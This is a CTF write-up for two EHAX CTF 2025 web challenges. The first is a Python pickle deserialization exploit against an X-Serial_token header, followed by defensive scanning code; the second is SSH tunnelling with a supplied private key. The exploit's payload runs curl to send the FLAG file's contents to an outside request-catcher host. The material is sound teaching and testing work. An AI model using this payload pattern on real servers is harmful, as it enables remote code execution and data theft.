# EHAX CTF 2025

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FDnwDy6yMnzRPErytq5kR%2Fimage.png?alt=media&#x26;token=6baa9600-6de8-47e0-a486-ae952c7284ce" alt=""><figcaption><p>26 / 729</p></figcaption></figure>

For the Pwn, Rev and Crypto challenges, check out my teammate's writeup: <https://mikimiku.gitbook.io/more-more-pwn/contests/ctf-tours/ehax-ctf-2025>

| Challenge                                                                                                  | Category |
| ---------------------------------------------------------------------------------------------------------- | -------- |
| [serialize](https://aurichia.gitbook.io/aurichia-docs/ctfs-tours/2025/ehax-ctf-2025#serialize)             | Web      |
| [Quandale Dingle](https://aurichia.gitbook.io/aurichia-docs/ctfs-tours/2025/ehax-ctf-2025#quandale-dingle) | Web      |

***

{% stepper %}
{% step %}

### serialize

> author: benzo

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FZkFlIupRkHikK1Utp1NC%2Fimage.png?alt=media&#x26;token=30a9bccd-a5bd-4f6b-9c97-f9ea4f945b8f" alt=""><figcaption></figcaption></figure>

Starting the challenge, we are greeted by a login page. After some simple enumeration:

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2F9k6ibiHNe2IJvhcJ2dh4%2Fimage.png?alt=media&#x26;token=19fafd00-e305-48fd-ae9f-c09a4c9da111" alt=""><figcaption></figcaption></figure>

we can see that the website's JavaScript is obfuscated with JSFuck, so we can just run it through an online decoder such as <https://enkhee-osiris.github.io/Decoder-JSFuck/>.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2Fdry4mrvE7DohkubwhvYs%2Fimage.png?alt=media&#x26;token=64bbe5dc-f551-4362-ad9c-0e53d0bff1e3" alt=""><figcaption></figcaption></figure>

After renaming the variables:

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FdoNY4ETgjMT6IkHPvF2T%2Fimage.png?alt=media&#x26;token=5efc8b6f-873c-4542-bbef-aafa9d10e0c0" alt=""><figcaption></figcaption></figure>

now the code is much easier to read, and we can see the username and password of the user dreky.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FqPgkA9XyM83mB4Ub2xpo%2Fimage.png?alt=media&#x26;token=b781eed1-426f-4165-a800-d3155eb4726c" alt="" width="521"><figcaption></figcaption></figure>

Logging in, we were redirected to a picture, which was odd, so I logged in again, intercepted the request and found a hidden endpoint.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FVEFXqHsusXnu7cLWhiej%2Fimage.png?alt=media&#x26;token=372f7051-269e-486e-848d-056132f7a708" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FKVoCPlWBiQP2yWyh6cq2%2Fimage.png?alt=media&#x26;token=b2a46d65-8adc-46ee-8854-d4c5bf7f029b" alt=""><figcaption></figcaption></figure>

There we found part 1 of the flag. After another round of enumeration on the new page,

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FEaYjDAbrWMbXiJG2fajM%2FScreenshot%202025-02-16%20125547.png?alt=media&#x26;token=45e70ee2-9ba5-41b7-a55f-df38d6a696e8" alt=""><figcaption></figcaption></figure>

I found this endpoint referenced in the CSS file,

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2F2tpopIy65v3LQCQR9dmr%2FScreenshot%202025-02-16%20125626.png?alt=media&#x26;token=74e376c3-040a-4d84-b0e2-72f48ab0b22d" alt=""><figcaption></figcaption></figure>

and we managed to get to part 2.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FlZfvbr6Yutau3vwJ8aIS%2FScreenshot%202025-02-16%20134501.png?alt=media&#x26;token=9c65c7a2-ba01-4cb0-b3fe-d00403e125e2" alt=""><figcaption></figcaption></figure>

Looking at the request, there is a strange token in the X-Serial\_token header. After base64-decoding it we can see that it wraps a system command, so the web app seems to use pickle to serialize and deserialize the token; you can read about pickle here: <https://www.geeksforgeeks.org/pickle-python-object-serialization/>

So we can easily create our own payload for the server to run with the following script:

{% code overflow="wrap" %}

```python
import pickle
import base64
import os

class Exploit:
    # pickle calls __reduce__ when serializing; the returned (callable, args)
    # pair is what the server's pickle.loads() executes on deserialization
    def __reduce__(self):
        return (os.system, ("curl https://huanggay.requestcatcher.com?a=$(cat FLAG)",))

payload = pickle.dumps(Exploit())
# the server expects the pickle base64-encoded in the X-Serial_token header
encoded_payload = base64.b64encode(payload).decode()

print(encoded_payload)
```

{% endcode %}

We then place the encoded payload in the header as `X-Serial_token: payload` and replay the request. In my payload I make the server curl my own request catcher so that I can see the result.
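From the defending side, the fix is to never let pickle resolve a callable out of an untrusted header. The following is an added example, not part of the writeup or the challenge: it disassembles a base64 token of the `X-Serial_token` shape with pickletools to list the globals it would import (without loading it), and loads tokens through a restricted Unpickler that refuses every global reference; both sample tokens are constructed inline.

```python
import base64
import io
import os
import pickle
import pickletools

class _Constructed:
    """Constructed sample only: a pickle that calls os.system, the same shape as
    the writeup's payload. Nothing below ever executes it."""
    def __reduce__(self):
        return (os.system, ("id",))

# Sample X-Serial_token values, constructed here (not captured from the challenge).
BENIGN_TOKEN = base64.b64encode(pickle.dumps({"user": "dreky", "part": 2}, protocol=4)).decode()
HOSTILE_TOKEN = base64.b64encode(pickle.dumps(_Constructed(), protocol=4)).decode()

STRING_OPS = {"SHORT_BINUNICODE", "BINUNICODE", "BINUNICODE8", "UNICODE",
              "STRING", "BINSTRING", "SHORT_BINSTRING"}

def global_refs(token: str) -> list[str]:
    """List every module.name a token would import, by disassembling it instead of
    loading it. A non-empty result means the token can run code under pickle.loads()."""
    refs, strings = [], []
    for op, arg, _pos in pickletools.genops(base64.b64decode(token)):
        if op.name in STRING_OPS:
            strings.append(arg)
        elif op.name == "GLOBAL":          # protocol <= 3: arg is "module name"
            refs.append(".".join(arg.split()))
        elif op.name == "STACK_GLOBAL":    # protocol >= 4: last two pushed strings
            refs.append(f"{strings[-2]}.{strings[-1]}")
    return refs

class _RestrictedUnpickler(pickle.Unpickler):
    # Plain dicts, lists, strings and ints never need find_class, so refusing every
    # global reference keeps data tokens working and blocks os.system and friends.
    def find_class(self, module, name):
        raise pickle.UnpicklingError(f"refusing global reference {module}.{name}")

def safe_loads(token: str):
    """Decode a token the way the server should have: data only, no callables."""
    return _RestrictedUnpickler(io.BytesIO(base64.b64decode(token))).load()

def rejects(token: str) -> bool:
    """True when safe_loads refuses the token (the outcome we want for the attack)."""
    try:
        safe_loads(token)
    except pickle.UnpicklingError:
        return True
    return False
```

The first check is the one to run in a WAF or log pipeline over captured header values; the second is what the server should have used instead of a bare `pickle.loads()`.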

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FPrjzdt9yTyVCYImzf1r8%2Fimage.png?alt=media&#x26;token=0c82be27-27f7-4117-822d-b8f82307f643" alt=""><figcaption></figcaption></figure>

I made the server run `ls` and base64-encode the output so that I could see the whole result.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FRyJpVbOH5pxmA0Ym1sSs%2FScreenshot%202025-02-16%20164720.png?alt=media&#x26;token=86a20b21-4140-426f-b1b3-ff92b7c00922" alt=""><figcaption></figcaption></figure>

Using CyberChef we can decode it, and we can see there is a file called FLAG, which we can just cat.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FUsH0hUARfvD7m9HC4OAl%2Fimage.png?alt=media&#x26;token=c74bedb3-5cfe-41ac-8370-c071c463d786" alt=""><figcaption></figcaption></figure>

And we solved the challenge!

E4HX{oh\_h3l1\_n44www\_y0u\_8r0k3\_5th\_w4l1}
{% endstep %}

{% step %}

### Quandale Dingle

> What's up guys! It's Quandale Dingle here! (rheheheh) I have been arrested for multiple crimes. Including: Searching for videos which I shouldn't on `MACHINE IP` /stream
>
> author: anonimbus, benzo

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FhCltgqpVtuO8R5IPVIcH%2Fimage.png?alt=media&#x26;token=5868be78-7d34-4419-897f-67dbe79d17f4" alt=""><figcaption></figcaption></figure>

Starting the challenge, we were given a PEM file,

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FtGUgSKnhGF5FPfoCcTg7%2FScreenshot%202025-02-16%20211607.png?alt=media&#x26;token=3a22b424-b5fc-4056-86a8-21923690df75" alt="" width="519"><figcaption></figcaption></figure>

and it was a private key. That's good to know, because we can just connect to the server with it and gain RCE.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FOljN5eQzMzJ5BGnTEZYj%2Fimage.png?alt=media&#x26;token=028057ba-0c8a-4e12-984e-70c77a89483d" alt=""><figcaption></figcaption></figure>

After accessing the server it seems we have very limited privileges: we can't even run simple bash commands or get anything useful out of it. But what if we can reach the web server?

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FhuEnCBsKWlJ8McgIYsca%2Fimage.png?alt=media&#x26;token=9111146d-2a04-420a-a932-999de849bde5" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FoDjQVMYG6znPF6RfGuJu%2Fimage.png?alt=media&#x26;token=89acde58-4594-4efd-9e88-3c5122958719" alt=""><figcaption></figcaption></figure>

First I tried forwarding port 80, but the server wasn't using that port at all, so I tried the other web server port, 8080.

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FwrlCAndNXVaqkKTL2pp7%2Fimage.png?alt=media&#x26;token=46c7e1ab-2026-41b4-aa49-fcc442075edf" alt=""><figcaption></figcaption></figure>

<figure><img src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FcxEPp3fSOpTWkJQflryu%2Fimage.png?alt=media&#x26;token=b7c84036-c921-4f0f-aa12-36b2b16fd5d5" alt=""><figcaption></figcaption></figure>

We can actually access the web server and grab an mp4 file.

{% file src="https://2781327171-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FMuMceEGBvWN37BjlZKgv%2Fuploads%2FGrdgJoNLtsUY07swKldl%2Fbruh_AjUx3sbY.mp4?alt=media&token=b2b8cd2e-3679-46ec-9566-210b2470952f" %}

And we got the very epic video above, with the flag shown in the video.

EH4X{55H\_Tunn3linG}
{% endstep %}
{% endstepper %}
